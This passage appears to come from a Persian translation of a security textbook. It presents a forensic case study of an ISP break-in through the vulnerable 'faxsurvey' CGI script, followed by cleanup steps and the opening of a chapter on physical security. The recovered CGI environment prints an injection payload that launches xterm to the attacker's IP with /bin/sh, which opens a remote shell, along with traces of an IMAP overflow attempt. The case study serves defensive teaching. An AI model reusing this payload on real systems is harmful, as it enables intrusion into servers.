ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ stringsﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻬﺎﺟﻢ ﺑﺪﺳـﺖ ﺁﻳـﺪ .ﻳـﻚ ﮔـﺮﻭﻩ ﺍﺯ ﺭﺷـﺘﻪﻫـﺎ
٤٨
ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﺑﻘﺔ ﭘﻮﺳﺘﻪ ﻣﻲﺷﺪﻧﺪ ،ﻛﻪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﻓﺮﺍﻣﻴﻦ ﺗﺎﻳﭗﺷﺪﻩ ﺗﻮﺳﻂ ﺷﺨﺺ ﻣﻬﺎﺟﻢ ﺑﻮﺩﻧﺪ .ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻣﻬﺎﺟﻢ ﻳﻚ rootkit
ﺭﺍ downloadﻛﺮﺩﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻼﺵ ﺩﺍﺷﺘﻪ ﻛﻪ ﻳﻚ ﺣﻤﻠﺔ ﺳﺮﺭﻳﺰﻱ ٤٩Bufferﻋﻠﻴﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ IMAPﺳﻴﺴﺘﻢ ﺍﻧﺠﺎﻡ ﺩﻫﺪ:
/bin/sh
/bin/sh
/etc/inetd.conf
qpush.c
/usr/bin/gcc
n/gcc
./cc
Expr
Done
/bin/sh
inetd.conf
t) | telnet 127.1 143
cd /etc
cat.s
which pwd
ls –lFa
expr $L + 1
ls –lFa
./cc –10
./cc
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻣﺘﻐﻴﻴﺮﻫﺎﺋﻲ ﺑﻮﺩﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺍﺯ.ﻧﻮﻉ ﺩﻭﻡ ﺭﺷﺘﻪﻫﺎ ﻛﻪ ﺩﺭ ﺗﺼﺎﻭﻳﺮ ﺣﺎﻓﻈﻪ ﭘﻴﺪﺍ ﺷﺪﻧﺪ ﻣﺘﻨﺎﻇﺮ ﻣﺘﻐﻴﻴﺮﻫﺎﻱ ﭘﻮﺳﺘﻪ ﺑﻮﺩﻧﺪ
CGI ﻛﻪ ﻣﺆﻳﺪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺍﺟﺮﺍﻱ ﭘﻮﺳﺘﻪ ﻧﺘﻴﺠﺔ ﻳﻚ ﺗﻬـﺎﺟﻢ- ﺑﺮﺍﻱ ﻳﻚ ﭘﺮﺩﺍﺯﻩ ﺗﻨﻈﻴﻢ ﺷﻮﻧﺪCGI ﻃﺮﻳﻖ ﺗﺨﻢﺭﻳﺰﻱ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ
ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﺔ ﻣﺮﺑـﻮﻁ ﺑـﻪ، ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﻧﻔـﻮﺫ ﻣﺘﻮﺟـﻪ ﺁﻥ ﺑـﻮﺩCGI ﺍﻳﻦ ﻗﺴﻤﺖ )ﺑﺨﺶ ﺯﻳﺮ( ﺗﺄﻳﻴﺪ ﻣﻲﻛﺮﺩ ﺁﻥ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ.ﺑﻮﺩﻩ ﺍﺳﺖ
: ﺑﻮﺩfaxsurvey
GATEWAY_INTERFACE=CGI/1.1
REMOTE_HOST=krldb110-06.splitrock.net
MACHTYPE=i386-pc-bsdi3.1
HOSTNAME=apache.vineyard.net
L=100
SHLVL=1
REMOTE_ADDR=209.156.113.121
QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20- rv%20-
e%20/bin/sh
DOCUMENT_ROOT=/htdocs/biz/captiva
REMOTE_PORT=4801
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd. ms-powerpoint,
*/*
SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
HTTP_HOST=www.captivacruises.com
LOGNAME=http
WINDOWID=8388621
_=/bins
REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.
113.121:0.0%20-rv%20-e%20/bin/sh
SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002
TERM=xterm
HTTP_CONNECTION=Keep-Alive
PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin
HTTP_ACCEPT_LANGUAGE=en-us
DISPLAY=209.156.113.121:0.0
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
SHELL=/bin/tcsh
REQUEST_METHOD=GET
OSTYPE=bsdi3.1
SERVER_ADMIN=mvol@vineyard.net
SERVER_ROOT=/usr/local/apache
TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode:
:al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[
%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\
E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc
SERVER_PORT=80
SCRIPT_NAME=/cgi-bin/faxsurvey
HOSTTYPE=i386
٢٧٧ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﭘﺲ ﺍﺯ ﻧﻔﻮﺫ ISP ،ﻗﺮﺑﺎﻧﻲ ﺑﺎ ﺩﻓﺘﺮ ﺗﺠﺴﺲ ﺩﻳﻮﺍﻥ ﻓﺪﺭﺍﻝ ﺩﺭ ﺑﻮﺳﺘﻮﻥ ﺗﻤﺎﺱ ﮔﺮﻓﺖ ISP .ﻣﻄﻠﻊ ﺷﺪ ﻛـﻪ ﺩﻓﺘـﺮ ﺑﻮﺳـﺘﻮﻥ ﭘـﻴﺶ ﺍﺯ ﺁﻧﻜـﻪ
ﺗﺤﻘﻴﻘﺎﺗﻲ ﺭﺍ ﺷﺮﻭﻉ ﻛﻨﺪ ﻻﺯﻡ ﺍﺳﺖ ﺑﻴﺶ ﺍﺯ ﺳﻘﻒ ﻫﺸﺖ ﻫﺰﺍﺭ ﺩﻻﺭ ﺧﺴﺎﺭﺕ ﺩﻳﺪﻩ ﺑﺎﺷﺪ .ﭼﻮﻥ ﻣﻴﺰﺍﻥ ﺧـﺴﺎﺭﺕ ﺑـﻪ ﺍﻳـﻦ ﺳـﻘﻒ ﺣـﺪﺍﻗﻠﻲ
ﻧﺮﺳﻴﺪﻩ ﺑﻮﺩ ،ﻫﻴﭻ ﺗﺠﺴﺴﻲ ﺷﺮﻭﻉ ﻧﺸﺪ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﺣﺪﺍﻗﻞﻫﺎﻳﻲ ﻗﺎﺑﻞ ﺩﺭﻙ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﻪ ﺩﻭ ﺩﻟﻴﻞ ﻋﻤﺪﻩ ﺑﻬﺘﺮ ﺍﺳﺖ
ﺍﻳﻨﮕﻮﻧﻪ ﻧﺒﺎﺷﺪ:
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻠﻪﻫﺎ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺴﺒﺘﹰﺎ ﺟﻮﺍﻥ ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﺩ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺍﺧﻄﺎﺭﻳﻪ ﻳﺎ ﺣﺪﺍﻛﺜﺮ ﻳـﻚ ﺣﻜـﻢ •
ﺗﻌﻠﻴﻖ ،ﭼﻨﻴﻦ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺭﺍ ﻣﺘﻮﻗﻒ ﻛﻨﻨﺪ .ﻓﻘﺪﺍﻥ ﺗﺠﺴﺲ ﺭﺳﻤﻲ ﻭ ﭘﻴﮕﻴﺮﻱ ﺻـﺮﻓﹰﺎ ﺍﻳـﻦ ﻣﻬﺎﺟﻤـﺎﻥ ﺭﺍ ﺗـﺸﻮﻳﻖ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑـﻪ
ﺟﺮﻣﻬﺎﻱ ﺑﺰﺭﮔﺘﺮ ﻭ ﺑﺰﺭﮔﺘﺮ ﺑﭙﺮﺩﺍﺯﻧﺪ ﺗﺎ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺟﺪﻱ ﺑﺪﻭﺷﺸﺎﻥ ﺑﻴﻔﺘﺪ.
ﻻ ﺑـﺎ ﻋـﺪﻡ ﺗﻮﺟـﻪ ﺳـﺎﻳﺮﻳﻦ ﻣﻮﺍﺟـﻪ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺴﻴﺎﺭ ﺧﺒﺮﻩ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺩﻳﮕﺮ ﻛﻪ ﻣﻌﻤﻮ ﹰ •
ﻣﻲﺷﻮﺩ ﺩﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﺯﺭﺳﻴﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺍﺯ ﺟﺮﺍﺋﻢ ﻛﻮﭼﻚ ،ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺭﺍ ﺑﻪ ﺳـﻤﺖ
ﺟﺮﺍﺋﻢ ﺑﺰﺭﮒ ﺍﻗﺘﺼﺎﺩﻱ ﻫﺪﺍﻳﺖ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻳﻚ ﺍﺧﺘﻼﻑ ﺣﺴﺎﺑﺮﺳﻲ ۷۵ﺳﻨﺘﻲ ﺑﺎﻋﺚ ﺷـﺪ ﻛـﻪ ﻛﻠﻴـﻒ ﺍﺳـﺘﻮﻝ ٥٠ﻳـﻚ
ﻧﻔﻮﺫﮔﺮ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺭﺩﻳﺎﺑﻲ ﻛﻨﺪ ﻛﻪ ﺳﺮﺍﻧﺠﺎﻡ ﻣﺸﺨﺺ ﺷﺪ ﺑﻪ ﺩﺳﺘﻮﺭ ﺍﺗﺤﺎﺩ ﺟﻤﺎﻫﻴﺮ ﺷﻮﺭﻭﻱ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﻧﻈﺎﻣﻲ ﺍﻳﺎﻻﺕ
ﻣﺘﺤﺪﻩ ﻧﻔﻮﺫ ﻛﺮﺩﻩ ﺍﺳﺖ) .ﺩﺍﺳﺘﺎﻧﻲ ﻛﻪ ﺟﺰﺋﻴﺎﺕ ﺁﻥ ﺩﺭ ﻧﻤﺎﻳﺸﻨﺎﻣﻪ ﭘﻠﻴﺴﻲ "ﻧﻔﻮﺫﮔﺮ ﻛﻼﺳﻴﻚ" ٥١ﺍﺳﺘﻮﻝ؛ "ﺗﺨﻢ ﻣﺮﻍ ﻛﺎﻛﻮ" ٥٢ﺁﻣﺪﻩ ﺍﺳﺖ(.
ﻭﻗﺘﻲ ﻣﺴﺌﻠﻪ ﺭﻭﺷﻦ ﺷﺪ ،ﻣﻌﻠﻮﻡ ﺷﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ faxsurveyﺣﺪﻭﺩ ﺳﻪ ﻣﺎﻩ ﻗﺒـﻞ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﻪ ﺩﺭ ﮔـﺮﻭﻩ
ﭘﺴﺘﻲ BugTraqﮔﺰﺍﺭﺵ ﺷﺪﻩ ﺑﻮﺩ .ﻳﺎ ﻛﺴﻲ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ISPﭘﻴﺎﻣﻬﺎﻱ ﮔﺮﻭﻩ ﭘﺴﺘﻲ BugTraqﺭﺍ ﻧﺨﻮﺍﻧﺪﻩ ﺑﻮﺩ ،ﻳﺎ ﺍﻳﻨﻜﻪ ﻛـﺴﻲ ﺧﺒـﺮ
ﻧﺪﺍﺷﺖ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺮﺑﻮﻁ ﺑﻪ faxsurveyﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ:
!Hi
There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any
command s/he wants with the permissions of the HTTP-Server.
Password-File.
All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package
installed are vulnerable to this attack.
>I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild <bs@suse.de
told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just
remove the script from the file list.
ﭘﺲ ﺍﺯ ﺗﻬﺎﺟﻢ ISP ،ﺗﻤﻴﺰﻛﺎﺭﻱﻫﺎﻱ ﺯﻳﺮ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﺍﺩ:
ﻳﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻓﻮﺭﻱ ﺍﺯ ﻫﻤﻪ ﺩﻳﺴﻜﻬﺎ ﺗﻬﻴﻪ ﺷﺪ .ﺍﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻌﻨﻮﺍﻥ ﺷﺎﻫﺪﻱ ﺑﺮ ﻛﺸﻒ ﺍﻳﻦ ﺗﺨﺮﻳﺐ ﻛـﻪ ﻧﻴـﺎﺯ ﺑـﻪ ﭘﻴﮕﻴـﺮﻱ •
ﺩﺍﺷﺖ ﻧﮕﻬﺪﺍﺭﻱ ﺷﺪ.
ﺳﻴﺴﺘﻢ ﺑﺪﻧﺒﺎﻝ ﻓﺎﻳﻠﻬﺎﻱ ﺑﺎ ﻣﺠﻮﺯﻫﺎﻱ ﺟﺪﻳﺪ ﭘﻮﻳﺶ ﺷﺪ .ﻫﻴﭻ ﻓﺎﻳﻠﻲ ﭘﻴﺪﺍ ﻧﺸﺪ. •
ﺩﺳﺘﺮﺳﻴﻬﺎ ﺩﺭ ﺷﺎﺧﻪ /usr/includeﻭ ﻛﺎﻣﭙﺎﻳﻠﺮ Cﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺖ ﻛﻪ ﺗﻨﻬﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﻓﺎﻳﻠﻬـﺎ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ •
ﺑﺎﺷﻨﺪ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﻛﺎﻣﭙﺎﻳﻞ ﻛﻨﻨﺪ.
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺑﺎ ﻧﺴﺨﻪ ﻣﻨﺘﺸﺮﺷﺪﺓ ﺍﻭﻟﻴﻪ ﺭﻭﻱ ﺩﻳﺴﮑﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻣﻘﺎﻳﺴﻪ ﺷﺪﻧﺪ ﺗﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺣﺘﻤﺎﻟﻲ ﻣـﺸﺨﺺ ﺷـﻮﺩ .ﺩﺭ ﺁﻧﻬـﺎ •
ﺗﻐﻴﻴﺮﻱ ﺍﻳﺠﺎﺩ ﻧﺸﺪﻩ ﺑﻮﺩ.
ﻫﻤﺔ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺑﻄﻮﺭ ﺩﺳﺘﻲ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﺿﺎﻓﻪ ﻣﺸﻜﻮﻙ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ .ﻣﻮﺭﺩﻱ ﭘﻴﺪﺍ ﻧﺸﺪ. •
ﭘﺲ ﺍﺯ ﻳﻚ ﻫﻔﺘﻪ ﺿﺎﺑﻄﺔ ﻣﺴﻴﺮﻳﺎﺏ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ SplitRockﺭﺍ ﻣﺴﺪﻭﺩ ﻣﻲﻛﺮﺩ ﻟﻐﻮ ﺷﺪ. •
٢٧٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﺳﻮﻡ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﻛﻠﻴﺎﺕ
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ" ﻫﻤﺔ ﻛﺎﺭﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﺗﺎﻳﭗ ﻓﺮﺍﻣﻴﻦ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ؛ ﻣﺜﻞ ﺳﺎﺧﺘﻦ ﺳﻴﺴﺘﻢ ﺍﻋﻼﻡ ﺧﻄـﺮ ،ﻗﻔـﻞ
ﻛﺮﺩﻥ ﻳﻚ ﻛﻠﻴﺪ ﺭﻭﻱ ﻣﻨﺒﻊ ﺑﺮﻕ ﺭﺍﻳﺎﻧﻪ ،ﺍﺗﺎﻗﻚ ﻗﻔﻞﺷﺪﻩ ﻭ ﻣﺠﻬﺰ ﺑﻪ ﺩﻭﺭﺑﻴﻦ ﻣﺪﺍﺭﺑﺴﺘﺔ ﺭﺍﻳﺎﻧﻪ ،ﻭ ﻣﻘﺴﻢﻫﺎﻱ ﺑﺮﻕ ﻭ ﻣﻨﺒﻊ ﺑﺮﻕ ﻭﻗﻔﻪﻧﺎﭘـﺬﻳﺮ
) .٥٣(UPSﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻠﻪ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺳﺖ ﻏﺎﻟﺒﹰﺎ ﻧﺎﺩﻳﺪﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ .ﺍﻳﻦ ﻓﺼﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻣﻨﻴـﺖ
ﻓﻴﺰﻳﻜﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ ،ﺍﺯ ﺟﻤﻠﻪ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ ،ﺧﺮﺍﺑﻜﺎﺭﻱ ﻭ ﺳﺮﻗﺖ؛ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﺮﺍﻱ ﻧﺤـﻮﺓ ﺑﺮﺧـﻮﺭﺩ ﺑـﺎ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ
ﻣﻲﻛﻨﺪ.
ﺍﻭﻝ ﻣﺮﺩﻡ
ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻛﻴﺪ ﻧﻴﺴﺖ ﻛﻪ ﺩﺭ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﻭ ﺳﻮﺍﻧﺢ ،ﺯﻧﺪﮔﻲ ﻭ ﺍﻳﻤﻨﻲ ﭘﺮﺳﻨﻞ ﻫﻤﻮﺍﺭﻩ ﺑﺎﻳﺪ ﺑﺮ ﺩﺍﺩﻩﻫﺎ ﻳﺎ ﺗﺠﻬﻴﺰﺍﺕ ﻣﺪ ﻧﻈﺮ ﻣﻘﺪﻡ ﺑﺎﺷـﺪ.
ﺍﮔﺮﭼﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺍﻳﻦ ﺍﺻﻞ ﺍﺳﺘﺜﻨﺎﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻣﺤﺪﻭﺩﻱ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻣﺜ ﹰﻼ ﺩﺭ ﺷﺮﺍﻳﻂ ﺣﺴﺎﺱ ﻧﻈﺎﻣﻲ( ،ﺍﻣﺎ ﻫﻴﭽﮕﺎﻩ ﻧﺒﺎﻳﺪ ﺁﻧﭽﻪ
ﺭﺍ ﻛﻪ ﺣﻘﻴﻘﺘﹰﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺍﺳﺖ ﺍﺯ ﻧﻈﺮ ﺩﻭﺭ ﺩﺍﺷﺖ.
ﻭﺭﻭﺩﻱ ﺁﻧﺮﺍ ﺑﺎﺯ ﻣﻲﮔﺬﺍﺭﺩ .ﻣﺠﻠﻪﺍﻱ ﺩﺭ San Franciscoﺩﺭ ﻃﻮﻝ ﻳﻚ ﺭﻭﺯ ﺗﻌﻄﻴﻞ ﻣﻌﺎﺩﻝ ﺑﻴﺶ ﺍﺯ ﻳﻜﺼﺪ ﻫﺰﺍﺭ ﺩﻻﺭ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺶ ﺑﻪ
ﺳﺮﻗﺖ ﺭﻓﺘﻨﺪ ،ﭼﻮﻥ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﻛﺎﺭﺕ ﻛﻠﻴﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺑﺮﺍﻱ ﺑﺎﺯ ﻛﺮﺩﻥ ﺩﺭﺏ ﺳﺎﺧﺘﻤﺎﻥ ﻭ ﺍﺯ ﻛﺎﺭ ﺍﻧـﺪﺍﺧﺘﻦ ﺳﻴـﺴﺘﻢ ﺍﻋـﻼﻡ
ﺧﻄﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﻮﺩ .ﺍﻳﻦ ﻓﺮﺩ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺳﺎﺧﺘﻤﺎﻥ ﺑﻪ ﻣﻮﺗﻮﺭﺧﺎﻧﻪ -ﺟﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺍﻋﻼﻡ ﺧﻄﺮ ﺩﺭ ﺁﻧﺠـﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ -ﺭﻓﺘـﻪ
ﺑﻮﺩ؛ ﻭ ﮔﺰﺍﺭﺵ ﻣﻜﺘﻮﺏ ﺭﺍ ﻧﻴﺰ ﺍﺯ ﭼﺎﭘﮕﺮ ﺩﺳﺘﮕﺎﻩ ﺍﻋﻼﻡ ﺧﻄﺮ ﺑﻴﺮﻭﻥ ﻛﺸﻴﺪﻩ ﻭ ﻣﻨﻬﺪﻡ ﻛﺮﺩﻩ ﺑﻮﺩ.
ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﮔﻤﺎﻥ ﻣﻲﻛﻨﻨﺪ ﻣﻮﺍﺟﻬﺔ ﺻﺤﻴﺢ ﺑﺎ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﻳﺎ ﻣﺸﻜﻞ ﺍﺳﺖ .ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻤﻲ ﺗﻮﺍﻧﺎﻳﻲ ﺁﻧﺮﺍ ﺩﺍﺭﻧـﺪ ﻛـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺣﻤﻼﺕ ﻫﺴﺘﻪﺍﻱ ،ﺯﻣﻴﻦﻟﺮﺯﻩﻫﺎﻱ ﺑﺰﺭﮒ ،ﻳﺎ ﺑﻤﺐﮔﺬﺍﺭﻱﻫﺎﻱ ﺗﺮﻭﺭﻳﺴﺘﻲ ﺣﻔﺎﻇﺖ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﻫﺮﮔﺰ ﻧﺒﺎﻳﺪ ﺑـﻪ
ﺑﻬﺎﻧﺔ ﺧﻨﺜﻲ ﺷﺪﻥ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻓﺎﺟﻌﻪﺁﻣﻴﺰ ،ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺍﺯ ﺍﻧﺠﺎﻡ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺩﻗﻴﻖ ﺑﺮﺍﻱ ﻣﻮﺍﺭﺩ ﻧﺎﮔﻮﺍﺭ ﺑﺎﺯ ﺩﺍﺭﻳﻢ.
ﻼ ﺑﺮﺍﻱ ﭘﺎﻳﮕﺎﻫﻬﺎ ﻳﺎ ﻣﺆﺳـﺴﺎﺕ ﻣﺨﺘﻠـﻒ ،ﻣﺘﻔـﺎﻭﺕ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺷﺎﻣﻞ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ -ﺗﻬﺪﻳﺪﻫﺎ ،ﺗﺠﺎﺭﺏ ،ﻭ ﺣﻔﺎﻇﻬﺎ -ﻋﻤ ﹰ
ﻫﺴﺘﻨﺪ .ﭼﻮﻥ ﻫﺮ ﭘﺎﻳﮕﺎﻩ ﺑﺎ ﭘﺎﻳﮕﺎﻩ ﺩﻳﮕﺮ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ ،ﺍﻳﻦ ﻓﺼﻞ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺧﺎﺹ ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻭ ﺗﻨﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ
ﻳﻚ ﻧﻘﻄﻪ ﺷﺮﻭﻉ ،ﻳﻚ ﻓﻬﺮﺳﺖ ﺍﺯ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ ،ﻭ ﻳﻚ ﺭﻭﻳﻪ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺑﺮﺍﻱ ﻓﺮﻣﻮﻝﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪ ﻭﺍﻗﻌﻲ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳﺪ.
ﺳﺎﻳﺮ ﺍﺣﺘﻤﺎﻻﺕ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻗﻼﻣﻲ ﻛﻪ ﺫﻛﺮ ﺷﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺄﺛﻴﺮ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺭﻭﻱ ﻋﻤﻠﻴﺎﺕ ﺧﻮﺩ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ:
ﺁﺗﺶ
ﻻ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﺗﺶ ﺑﺴﻴﺎﺭ ﻛﻢ ﺩﻭﺍﻡ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺯ ﺍﻳﻦ ﻗﺎﻋـﺪﻩ ﻣـﺴﺘﺜﻨﻲ ﺑﺎﺷـﺪ ﺍﺯ ﻭﺟـﻮﺩ ﺗﺠﻬﻴـﺰﺍﺕ
